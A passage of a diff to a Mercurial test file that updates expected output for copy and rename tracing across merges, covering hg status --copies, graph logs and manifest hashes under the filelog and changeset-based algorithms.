entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mL,CB+revertm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "n-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-n' + added : unrelated-n, ; + ##### revision "o-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-o' + added : unrelated-o, ; + ##### revision "mFG,Om" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mO,FGm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mGF,Nm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mN,GFm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mAE-change,Km" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mK,AE-change-m" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mEA-change,Jm" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mJ,EA-change-m" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' @@ -927,7 +2116,10 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' A f a + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' f A f a (no-changeset no-compatibility !) @@ -939,21 +2131,21 @@ - unrelated change on the other side $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - o 12 mABm-0 simple merge - the other way + o mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - one way + +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ - | o 5 b-1: b update + | o b-1: b update | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mABm")' @@ -982,12 +2174,18 @@ M b A f a + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBAm")' M b A f a + A t + p R a + R p merging with the side having a delete ------------------------------------- @@ -998,23 +2196,23 @@ and recreate an unrelated file after the merge $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' - o 16 mCBm-1 re-add d + o mCBm-1 re-add d | - o 15 mCBm-0 simple merge - the other way + o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ - | | o 14 mBCm-1 re-add d + | | o mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - one way + +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r - comparing from the merge @@ -1034,10 +2232,16 @@ R d $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-0")' M b + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-0")' M b + A t + p R a + R p - comparing with the merge children re-adding the file @@ -1060,11 +2264,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-1")' M b A d + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-1")' M b A d + A t + p R a + R p Comparing with a merge re-adding the file afterward --------------------------------------------------- @@ -1074,21 +2284,21 @@ - one deleting and recreating the change $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - o 18 mDBm-0 simple merge - the other way + o mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - one way + +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ - | o 8 d-2 re-add d + | o d-2 re-add d | | - | o 7 d-1 delete d + | o d-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBDm-0")' M d @@ -1115,93 +2325,102 @@ $ hg manifest --debug --rev 'desc("d-2")' | grep '644 d' b004912a8510032a0350a74daa2803dadfb00e12 644 d $ hg manifest --debug --rev 'desc("b-1")' | grep '644 d' - 169be882533bc917905d46c0c951aa9a1e288dcf 644 d (no-changeset !) - b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 d (changeset !) - $ hg debugindex d | head -n 4 + d8252ab2e760b0d4e5288fd44cbd15a0fa567e16 644 d (no-changeset !) + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) + $ hg debugindex d | head -n 4 | ../no-linkrev rev linkrev nodeid p1 p2 - 0 2 169be882533b 000000000000 000000000000 (no-changeset !) - 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !) - 1 8 b004912a8510 000000000000 000000000000 - 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !) - 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !) + 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 * ae258f702dfe 000000000000 000000000000 (changeset !) + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) + 2 * 5cce88bf349f ae258f702dfe 000000000000 (changeset !) Log output should not include a merge commit as it did not happen $ hg log -Gfr 'desc("mBDm-0")' d - o 8 d-2 re-add d + o d-2 re-add d | ~ $ hg log -Gfr 'desc("mDBm-0")' d - o 8 d-2 re-add d + o d-2 re-add d | ~ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBDm-0")' M b A d + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDBm-0")' M b A d + A t + p R a + R p Comparing with a merge with colliding rename -------------------------------------------- +Subcase: new copy information on both side +`````````````````````````````````````````` + - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - o 20 mEAm-0 simple merge - the other way + o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 simple merge - one way + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | o e-1 b -move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - c39c6083dad048d5138618a46f123e2f397f4f18 644 f + 2ff93c643948464ee1f871867910ae43a45b0bea 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - a9a8bc3860c9d8fa5f2f7e6ea8d40498322737fd 644 f + 2ff93c643948464ee1f871867910ae43a45b0bea 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - 263ea25e220aaeb7b9bac551c702037849aa75e8 644 f + b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 71b9b7e73d973572ade6dd765477fcee6890e8b1 644 f - $ hg debugindex f + e8825b386367b29fec957283a80bb47b47483fe1 644 f + $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 - 0 4 263ea25e220a 000000000000 000000000000 - 1 10 71b9b7e73d97 000000000000 000000000000 - 2 19 c39c6083dad0 263ea25e220a 71b9b7e73d97 - 3 20 a9a8bc3860c9 71b9b7e73d97 263ea25e220a + 0 * b76eb76580df 000000000000 000000000000 + 1 * e8825b386367 000000000000 000000000000 + 2 * 2ff93c643948 b76eb76580df e8825b386367 + 3 * 2f649fba7eb2 b76eb76580df e8825b386367 + 4 * 774e7c1637d5 e8825b386367 b76eb76580df #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - 498e8799f49f9da1ca06bb2d6d4accf165c5b572 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - c5b506a7118667a38a9c9348a1f63b679e382f57 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 1e88685f5ddec574a34c70af492f95b6debc8741 644 f - $ hg debugindex f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 - 0 4 b789fdd96dc2 000000000000 000000000000 - 1 10 1e88685f5dde 000000000000 000000000000 - 2 19 498e8799f49f b789fdd96dc2 1e88685f5dde - 3 20 c5b506a71186 1e88685f5dde b789fdd96dc2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * d3613c1ec831 ae258f702dfe 000000000000 + 2 * 05e03c868bbc ae258f702dfe 000000000000 #endif # Here the filelog based implementation is not looking at the rename @@ -1209,20 +2428,20 @@ # based on works fine. We have different output. $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAEm-0")' - M f - b (no-filelog !) + M f (no-changeset !) + b (no-filelog no-changeset !) R b $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEAm-0")' - M f - b (no-filelog !) + M f (no-changeset !) + b (no-filelog no-changeset !) R b $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAEm-0")' - M f - d (no-filelog !) + M f (no-changeset !) + d (no-filelog no-changeset !) R d $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEAm-0")' - M f - d (no-filelog !) + M f (no-changeset !) + d (no-filelog no-changeset !) R d $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")' A f @@ -1258,15 +2477,24 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm-0")' A f a + A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm-0")' A f a (filelog !) b (no-filelog !) + A t + p R a R b - + R p + + +Subcase: existing copy information overwritten on one branch +```````````````````````````````````````````````````````````` Note: | In this case, one of the merge wrongly record a merge while there is none. @@ -1278,90 +2506,196 @@ - one overwriting a file (d) with a rename (from h to i to d) $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - o 24 mFBm-0 simple merge - the other way + o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - one way + +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ - | o 22 f-2: rename i -> d + | o f-2: rename i -> d | | - | o 21 f-1: rename h -> i + | o f-1: rename h -> i | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBFm-0")' M b A d h + A t + p R a R h + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFBm-0")' M b A d h + A t + p R a R h + R p $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBFm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBFm-0")' M b $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBFm-0")' M b - M d - i (no-filelog !) + M d (no-changeset !) + i (no-filelog no-changeset !) R i $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFBm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFBm-0")' M b $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFBm-0")' M b - M d - i (no-filelog !) + M d (no-changeset !) + i (no-filelog no-changeset !) R i #if no-changeset $ hg log -Gfr 'desc("mBFm-0")' d - o 22 f-2: rename i -> d + o f-2: rename i -> d | - o 21 f-1: rename h -> i + o f-1: rename h -> i : - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mBFm-0")' d - o 22 f-2: rename i -> d + o i-2: c -move-> d, s -move-> t | ~ #endif #if no-changeset $ hg log -Gfr 'desc("mFBm-0")' d - o 22 f-2: rename i -> d + o f-2: rename i -> d | - o 21 f-1: rename h -> i + o f-1: rename h -> i : - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFBm-0")' d - o 22 f-2: rename i -> d + o i-2: c -move-> d, s -move-> t | ~ #endif +Subcase: existing copy information overwritten on one branch, with different content) +````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch + + $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))' + o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + |\ + +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + | |/ + | o r-2: rename t -> x + | | + | o r-1: rename r -> x + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBRm-0")' + M b + A d + a + A t + r + R a + R p + R r + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mRBm-0")' + M b + A d + a + A t + r + R a + R p + R r + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBRm-0")' + M t + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mBRm-0")' + M b + $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mBRm-0")' + M b + M t + x (no-filelog !) + R x + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mRBm-0")' + M t + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mRBm-0")' + M b + $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mRBm-0")' + M b + M t + x (no-filelog !) + R x + +#if no-changeset + $ hg log -Gfr 'desc("mBRm-0")' d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mBRm-0")' d + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +#if no-changeset + $ hg log -Gfr 'desc("mRBm-0")' d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mRBm-0")' d + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +Subcase: reset of the copy history on one side +`````````````````````````````````````````````` + Merge: - one with change to a file - one deleting and recreating the file @@ -1370,21 +2704,21 @@ consider history and rename on both branch of the merge. $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - o 27 mGDm-0 simple merge - the other way + o mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 simple merge - one way + +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d | | - o | 7 d-1 delete d + o | d-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r One side of the merge have a long history with rename. The other side of the merge point to a new file with a smaller history. Each side is "valid". @@ -1395,11 +2729,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDGm-0")' A d a (filelog !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGDm-0")' A d a + A t + p R a + R p $ hg status --copies --rev 'desc("d-2")' --rev 'desc("mDGm-0")' M d $ hg status --copies --rev 'desc("d-2")' --rev 'desc("mGDm-0")' @@ -1411,28 +2751,28 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -1440,32 +2780,34 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif +Subcase: merging a change to a file with a "copy overwrite" to that file from another branch +```````````````````````````````````````````````````````````````````````````````````````````` Merge: - one with change to a file (d) @@ -1476,21 +2818,21 @@ $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - o 29 mGFm-0 simple merge - the other way + o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 simple merge - one way + +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Note: @@ -1504,15 +2846,15 @@ Details on this hash ordering pick: $ hg manifest --debug 'desc("g-1")' | egrep 'd$' - f2b277c39e0d2bbac99d8aae075c0d8b5304d266 644 d (no-changeset !) - 4ff57b4e8dceedb487e70e6965ea188a7c042cca 644 d (changeset !) + 17ec97e605773eb44a117d1136b3849bcdc1924f 644 d (no-changeset !) + 5cce88bf349f7c742bb440f2c53f81db9c294279 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("g-1")' d A d a (no-changeset no-compatibility !) $ hg manifest --debug 'desc("f-2")' | egrep 'd$' - 4a067cf8965d1bfff130057ade26b44f580231be 644 d (no-changeset !) - fe6f8b4f507fe3eb524c527192a84920a4288dac 644 d (changeset !) + 7b79e2fe0c8924e0e598a82f048a7b024afa4d96 644 d (no-changeset !) + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("f-2")' d A d h (no-changeset no-compatibility !) @@ -1521,15 +2863,22 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm-0")' A d - h + h (no-filelog !) + a (filelog !) + A t + p R a R h + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm-0")' A d - a (no-filelog !) - h (filelog !) + a (no-changeset !) + h (changeset !) + A t + p R a R h + R p $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFGm-0")' M d $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mGFm-0")' @@ -1543,74 +2892,194 @@ i (no-filelog !) R i $ hg status --copies --rev 'desc("g-1")' --rev 'desc("mFGm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("g-1")' --rev 'desc("mGFm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h #if no-changeset $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 simple merge - one way + o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 simple merge - one way - |\ - | o 25 g-1: update d - | | - o | 22 f-2: rename i -> d - |/ - o 2 i-2: c -move-> d + o g-1: update d + | + o i-2: c -move-> d, s -move-> t | ~ #endif #if no-changeset $ hg log -Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 simple merge - the other way + o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 simple merge - the other way - |\ - | o 25 g-1: update d - | | - o | 22 f-2: rename i -> d - |/ - o 2 i-2: c -move-> d + o g-1: update d + | + o i-2: c -move-> d, s -move-> t | ~ #endif +Subcase: new copy information on both side with an actual merge happening +````````````````````````````````````````````````````````````````````````` + +- the "p-" branch renaming 't' to 'v' (through 'u') +- the "q-" branch renaming 'r' to 'v' (through 'w') + + + $ hg log -G --rev '::(desc("mPQm")+desc("mQPm"))' + o mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + |\ + +---o mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + | |/ + | o q-2 w -move-> v + | | + | o q-1 r -move-> w + | | + o | p-2: u -move-> v + | | + o | p-1: t -move-> u + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +#if no-changeset + $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v' + 0946c662ef16e4e67397fd717389eb6693d41749 644 v + $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v' + 0db3aad7fcc1ec27fab57060e327b9e864ea0cc9 644 v + $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v' + 3f91841cd75cadc9a1f1b4e7c1aa6d411f76032e 644 v + $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v' + c43c088b811fd27983c0a9aadf44f3343cd4cd7e 644 v + $ hg debugindex v | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * 3f91841cd75c 000000000000 000000000000 + 1 * c43c088b811f 000000000000 000000000000 + 2 * 0946c662ef16 3f91841cd75c c43c088b811f + 3 * 0db3aad7fcc1 c43c088b811f 3f91841cd75c +#else + $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v' + 65fde9f6e4d4da23b3f610e07b53673ea9541d75 644 v + $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v' + a098dda6413aecf154eefc976afc38b295acb7e5 644 v + $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v' + 5aed6a8dbff0301328c08360d24354d3d064cf0d 644 v + $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v' + a38b2fa170219750dac9bc7d19df831f213ba708 644 v + $ hg debugindex v | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * 5aed6a8dbff0 000000000000 000000000000 + 1 * a38b2fa17021 000000000000 000000000000 + 2 * 65fde9f6e4d4 5aed6a8dbff0 a38b2fa17021 + 3 * a098dda6413a a38b2fa17021 5aed6a8dbff0 +#endif + +# Here the filelog based implementation is not looking at the rename +# information (because the file exist on both side). However the changelog +# based on works fine. We have different output. + + $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mPQm-0")' + M v + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mQPm-0")' + M v + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mPQm-0")' + M v + t (no-filelog !) + R t + $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mQPm-0")' + M v + t (no-filelog !) + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("p-2")' + A v + t + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("q-2")' + A v + r + R r + +# From here, we run status against revision where both source file exists. +# +# The filelog based implementation picks an arbitrary side based on revision +# numbers. So the same side "wins" whatever the parents order is. This is +# sub-optimal because depending on revision numbers means the result can be +# different from one repository to the next. +# +# The changeset based algorithm use the parent order to break tie on conflicting +# information and will have a different order depending on who is p1 and p2. +# That order is stable accross repositories. (data from p1 prevails) + + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mPQm-0")' + A v + t + R r + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mQPm-0")' + A v + t (filelog !) + r (no-filelog !) + R r + R t + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm-0")' + A d + a + A v + r (filelog !) + p (no-filelog !) + R a + R p + R r + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm-0")' + A d + a + A v + r + R a + R p + R r + Comparing with merging with a deletion (and keeping the file) ------------------------------------------------------------- @@ -1624,19 +3093,19 @@ copy tracing chain. $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - o 31 mGCm-0 + o mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 + +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 6 c-1 delete d + o | c-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r 'a' is the copy source of 'd' @@ -1644,11 +3113,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCGm-0")' A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGCm-0")' A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCGm-0")' A d $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mGCm-0")' @@ -1669,19 +3144,19 @@ copy tracing chain. $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - o 33 mBC-revert-m-0 + o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 + +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r 'a' is the the copy source of 'd' @@ -1690,12 +3165,18 @@ M b A d a (no-compatibility 